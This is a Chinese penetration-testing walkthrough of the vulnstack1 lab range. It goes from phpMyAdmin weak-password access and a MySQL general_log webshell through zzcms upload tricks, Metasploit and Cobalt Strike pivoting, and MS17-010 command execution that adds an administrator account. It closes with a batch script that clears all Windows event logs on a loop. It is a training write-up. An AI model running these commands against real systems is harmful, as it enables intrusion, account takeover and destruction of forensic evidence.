【红日靶场】vulnstack1-完整渗透过程

目录

  • 下载地址
  • 红日靶场
  • 基本环境配置
  • 攻击思维导图
    • 网络结构
  • 系统环境配置
  • 外网打点
    • 对phpmyadmin渗透
    • 对zzcms的渗透:
      • getshell失败案例
      • getshell成功案例
        • 模版制作:
        • 应用导入上传:
        • 其他方式:
  • 内网渗透
    • 信息收集
    • msf上线:
    • 搭建隧道
    • 内网探测
    • 上线cs横向移动(成功)
    • msf横向尝试(失败了)
    • 换了ms17-010命令执行poc
    • ftp匿名登录(失败)
    • 痕迹清理bat
    • 参考链接:

下载地址

下载地址

红日靶场

红队实战系列,主要以真实企业环境为实例搭建一系列靶场,通过练习、视频教程、博客三位一体学习。另外本次实战完全模拟ATT&CK攻击链路进行搭建,开成完整闭环。后续也会搭建真实APT实战环境,从实战中成长。关于环境可以模拟出各种各样实战路线,目前给出作者实战的一套攻击实战路线如下,虚拟机所有统一密码:hongrisec@2019:

一、环境搭建
1.环境搭建测试
2.信息收集

二、漏洞利用
3.漏洞搜索与利用
4.后台Getshell上传技巧
5.系统信息收集
6.主机密码收集

三、内网搜集
7.内网–继续信息收集
8.内网攻击姿势–信息泄露
9.内网攻击姿势-MS08-067
10.内网攻击姿势-SMB远程桌面口令猜测
11.内网攻击姿势-Oracle数据库TNS服务漏洞
12.内网攻击姿势-RPC DCOM服务漏洞

四、横向移动
13.内网其它主机端口-文件读取
14.内网其它主机端口-redis
15.内网其它主机端口-redis Getshell
16.内网其它主机端口-MySQL数据库
17.内网其它主机端口-MySQL提权

五、构建通道
18.内网其它主机端口-代理转发

六、持久控制
19.域渗透-域成员信息收集
20.域渗透-基础服务弱口令探测及深度利用之powershell
21.域渗透-横向移动[wmi利用]
22.域渗透-C2命令执行
23.域渗透-利用DomainFronting实现对beacon的深度隐藏
24.域渗透-域控实现与利用

七、痕迹清理
25、日志清理

基本环境配置

【红日靶场】vulnstack1-完整渗透过程_第1张图片

攻击思维导图

【红日靶场】vulnstack1-完整渗透过程_第2张图片

网络结构

主机 IP 网卡
Kali Linux 192.168.200.* NAT
Windwos7 192.168.200.* /192.168.52.* NAT/VMnet2
Win2k3 192.168.52.* VMnet2(仅主机)
Windows 192.168.52.* VMnet2(仅主机)

备注:按照自己喜好,可以设置NAT网卡和vmnet仅主机模式都行,因为windows7只要主机能够通信就行。
添加一个vmnet2网卡仅主机模式用于内网域环境通信:
【红日靶场】vulnstack1-完整渗透过程_第3张图片

点击应用保存

系统环境配置

windwos7使用双网卡:
我这已经添加:
【红日靶场】vulnstack1-完整渗透过程_第4张图片
启动靶机windows7
密码:hongrisec@2019
【红日靶场】vulnstack1-完整渗透过程_第5张图片
【红日靶场】vulnstack1-完整渗透过程_第6张图片
启动其他两台域控制器环境:
测试通信
【红日靶场】vulnstack1-完整渗透过程_第7张图片
查看域控制器环境
【红日靶场】vulnstack1-完整渗透过程_第8张图片
ping:注意这里不能pingwindows7(禁ping)
【红日靶场】vulnstack1-完整渗透过程_第9张图片

启动windows7 的web环境
【红日靶场】vulnstack1-完整渗透过程_第10张图片
关闭防火墙或者开放80端口:
【红日靶场】vulnstack1-完整渗透过程_第11张图片

到这里就可以开始渗透测试了

外网打点

目标:192.168.200.128
直接扫全端口:
【红日靶场】vulnstack1-完整渗透过程_第12张图片
还有永恒之蓝,如果防火墙开启应该就没有了。
【红日靶场】vulnstack1-完整渗透过程_第13张图片

发现80和3306端口开放
访问网站:发现phpstudy探针,系统为windows7
这里看到www目录的文件位置
【红日靶场】vulnstack1-完整渗透过程_第14张图片
扫描一下目录:
【红日靶场】vulnstack1-完整渗透过程_第15张图片
一些敏感文件:
【红日靶场】vulnstack1-完整渗透过程_第16张图片
phpmyadmin的版本
【红日靶场】vulnstack1-完整渗透过程_第17张图片

【红日靶场】vulnstack1-完整渗透过程_第18张图片

对phpmyadmin渗透

测试弱密码:
root
root
【红日靶场】vulnstack1-完整渗透过程_第19张图片
没想到这么简单就进来了

因为版本很多已知漏洞无法使用有一些POC:https://www.exploit-db.com/exploits/25003
这里用常用方法getshell:https://www.freebuf.com/articles/web/226240.html
【红日靶场】vulnstack1-完整渗透过程_第20张图片
收集到信息:
【红日靶场】vulnstack1-完整渗透过程_第21张图片

 show variables like '%general%';
 general_log:日志保存状态(这里为off)
general_log_file:日志保存路径

【红日靶场】vulnstack1-完整渗透过程_第22张图片
开启日志保存并配置保存路径

 set global general_log = "ON"; 
 set global general_log_file = "C:/phpStudy/WWW/log.php";
 select '';

【红日靶场】vulnstack1-完整渗透过程_第23张图片

【红日靶场】vulnstack1-完整渗透过程_第24张图片

【红日靶场】vulnstack1-完整渗透过程_第25张图片
打开蚁剑连接:

【红日靶场】vulnstack1-完整渗透过程_第26张图片
【红日靶场】vulnstack1-完整渗透过程_第27张图片

对zzcms的渗透:

【红日靶场】vulnstack1-完整渗透过程_第28张图片
访问一下:

尝试注册功能:

成功:

【红日靶场】vulnstack1-完整渗透过程_第29张图片
查找上传点:
【红日靶场】vulnstack1-完整渗透过程_第30张图片
测试一下上传:
【红日靶场】vulnstack1-完整渗透过程_第31张图片
先测试一下:
【红日靶场】vulnstack1-完整渗透过程_第32张图片
上传图片成功但是需要审核:这里就不能上传了,找一下后台登录点
【红日靶场】vulnstack1-完整渗透过程_第33张图片

没注意这里:

【红日靶场】vulnstack1-完整渗透过程_第34张图片

这里提示我们后台位置和账户密码大概漏洞存在与后台,可能作者是想让我们从cms上进行拿shell,这里也可将备份文件下载到本地进行代码审计

getshell失败案例

寻找上传点:
【红日靶场】vulnstack1-完整渗透过程_第35张图片
图集上传点:

【红日靶场】vulnstack1-完整渗透过程_第36张图片

【红日靶场】vulnstack1-完整渗透过程_第37张图片

寻找上传文件位置:没找到【红日靶场】vulnstack1-完整渗透过程_第38张图片

getshell成功案例

模版制作:

模版文件这好像可以直接添加php文件:
【红日靶场】vulnstack1-完整渗透过程_第39张图片
【红日靶场】vulnstack1-完整渗透过程_第40张图片
文件里面找到:
【红日靶场】vulnstack1-完整渗透过程_第41张图片
【红日靶场】vulnstack1-完整渗透过程_第42张图片

应用导入上传:

【红日靶场】vulnstack1-完整渗透过程_第43张图片
虽然我们不知道cms的应用怎么写的直接上传一个shell.php文件:
【红日靶场】vulnstack1-完整渗透过程_第44张图片

【红日靶场】vulnstack1-完整渗透过程_第45张图片
打包换个名字上传:

【红日靶场】vulnstack1-完整渗透过程_第46张图片

【红日靶场】vulnstack1-完整渗透过程_第47张图片
把member模块停用,启用test:
【红日靶场】vulnstack1-完整渗透过程_第48张图片

寻找上传文件:
【红日靶场】vulnstack1-完整渗透过程_第49张图片
【红日靶场】vulnstack1-完整渗透过程_第50张图片
【红日靶场】vulnstack1-完整渗透过程_第51张图片

连接测试:
这里我写错马了重新上传了一个test1连接:
【红日靶场】vulnstack1-完整渗透过程_第52张图片

其他方式:

可以通过3306登录获取shell,我们在下载模板文件时可以看到数据库的用户名密码:
这里没有进行测试
【红日靶场】vulnstack1-完整渗透过程_第53张图片
大家有兴趣可以尝试获取,也可以通过网上披露的已知漏洞进行攻击,也可以做深入的代码审计方法很多,包括使用永痕之蓝漏洞,msf可以直接提到system权限,这里不在继续。

内网渗透

传个fscan扫一扫:
【红日靶场】vulnstack1-完整渗透过程_第54张图片
【红日靶场】vulnstack1-完整渗透过程_第55张图片
【红日靶场】vulnstack1-完整渗透过程_第56张图片

信息收集

判断主机是否加入域

方法一:
net time /domain 
#如果当前主机处于工作组中未加入域,则显示找不到域控制器
#加入了域,且当前用户为本地用户包括本地管理员,则显示拒绝访问
加入了域,且当前用户域用户,则显示域控的时间

在这里插入图片描述

方法二:
net config workstation
#如果命令返回信息中包含“工作站域”,则说明该计算机已经加入了域。

【红日靶场】vulnstack1-完整渗透过程_第57张图片
【红日靶场】vulnstack1-完整渗透过程_第58张图片
看下网段:发现内网网段
【红日靶场】vulnstack1-完整渗透过程_第59张图片

方法三:
echo %userdomain%

在这里插入图片描述

这里可以看一下windows7使用杀软没:
【红日靶场】vulnstack1-完整渗透过程_第60张图片
没有识别到杀软,可以做msf上线或者做内网穿透或者冰蝎隧道(不推荐),看个人选择,也可以上线cs,做横向移动或者权限维持,这里我选择做简单的权限维持。

msf上线:

生成msf马:
【红日靶场】vulnstack1-完整渗透过程_第61张图片

kali监听:
【红日靶场】vulnstack1-完整渗透过程_第62张图片
上传马:
【红日靶场】vulnstack1-完整渗透过程_第63张图片
执行:
【红日靶场】vulnstack1-完整渗透过程_第64张图片

【红日靶场】vulnstack1-完整渗透过程_第65张图片
【红日靶场】vulnstack1-完整渗透过程_第66张图片
提权:getsystem
【红日靶场】vulnstack1-完整渗透过程_第67张图片

搭建隧道

background
使用sockes模块:
use auxiliary/server/socks_proxy
set srvport 1050
run

【红日靶场】vulnstack1-完整渗透过程_第68张图片
配置:
vim /etc/proxychains4.conf
添加:
【红日靶场】vulnstack1-完整渗透过程_第69张图片

内网探测

使用nmap探测一下:存在防火墙

proxychains  nmap -PN --script smb-vuln* -p139,445 192.168.52.138
proxychains  nmap -PN --script smb-vuln* -p139,445 192.168.52.141

【红日靶场】vulnstack1-完整渗透过程_第70张图片
【红日靶场】vulnstack1-完整渗透过程_第71张图片

上线cs横向移动(成功)

生成cs马:
【红日靶场】vulnstack1-完整渗透过程_第72张图片

上传运行:
【红日靶场】vulnstack1-完整渗透过程_第73张图片
提权:
【红日靶场】vulnstack1-完整渗透过程_第74张图片
探测:
【红日靶场】vulnstack1-完整渗透过程_第75张图片
抓取明文密码:这里我密码改了就不放出来了
【红日靶场】vulnstack1-完整渗透过程_第76张图片
添加smb的监听,因为我们拿到内网的一台权限了,使用这台上面的权限横向到其他两台上:
添加监听:
【红日靶场】vulnstack1-完整渗透过程_第77张图片
【红日靶场】vulnstack1-完整渗透过程_第78张图片
选择win7和我们加的监听:
【红日靶场】vulnstack1-完整渗透过程_第79张图片

【红日靶场】vulnstack1-完整渗透过程_第80张图片
另一台同样操作:成功获取内网权限

【红日靶场】vulnstack1-完整渗透过程_第81张图片

msf横向尝试(失败了)

代理后直接可以横向移动:
上面fscna探测出网段存在ms17-010直接利用:

利用失败了:
怀疑是防火墙拦截了(后面关了防火墙也不行)
【红日靶场】vulnstack1-完整渗透过程_第82张图片
我这想用msf上线,前面msf上线失败了因为kali的sock5代理有点问题我这用cs的代理:

【红日靶场】vulnstack1-完整渗透过程_第83张图片
使用kali做socks4的代理

换了ms17-010命令执行poc

使用ms17-010命令执行poc:

//这里直接创建用户julien密码julien@123
use auxiliary/admin/smb/ms17_010_command
set COMMAND net user
set RHOST 192.168.52.138
set COMMAND net user julien julien@123
run
//将hack用户添加到管理员组
set COMMAND net localgroup administrators julien /add
run
set COMMAND sc config tlntsvr start= auto
run
set COMMAND net start telnet
run
set COMMAND netstat -an
run

发现138这台23端口无法打开命令执行有问题,换成141这台远程是可以的但是一直提示我密码错误:不知道什么原因
【红日靶场】vulnstack1-完整渗透过程_第84张图片

ftp匿名登录(失败)

use auxiliary/scanner/ftp/anonymous
set rhosts  192.168.52.141
run

【红日靶场】vulnstack1-完整渗透过程_第85张图片
不存在后面版本:
但不能写入本次渗透就做到这里
【红日靶场】vulnstack1-完整渗透过程_第86张图片

痕迹清理bat

这里不在操作

@echo off
mode con cols=40 lines=7
color 89
title 自动清理日志
:up
echo  清理中 请稍等...
FOR /F "delims=" %%I IN ('WEVTUTIL EL') DO (WEVTUTIL CL "%%I") 
cls 
for /L %%a in (
 10,-1,0
) do (
echo ----------------------------------------
echo  每10分钟清理一次
echo ----------------------------------------
echo  %%a 分钟后开始清理
echo ----------------------------------------
ping -n 60 localhost 1>nul 2>nul
cls
)
goto up

参考链接:

https://www.freebuf.com/articles/web/324441.html
https://www.freebuf.com/articles/web/226240.html

你可能感兴趣的:(vulnstack,web安全,靶场,红日靶场,vulnstack)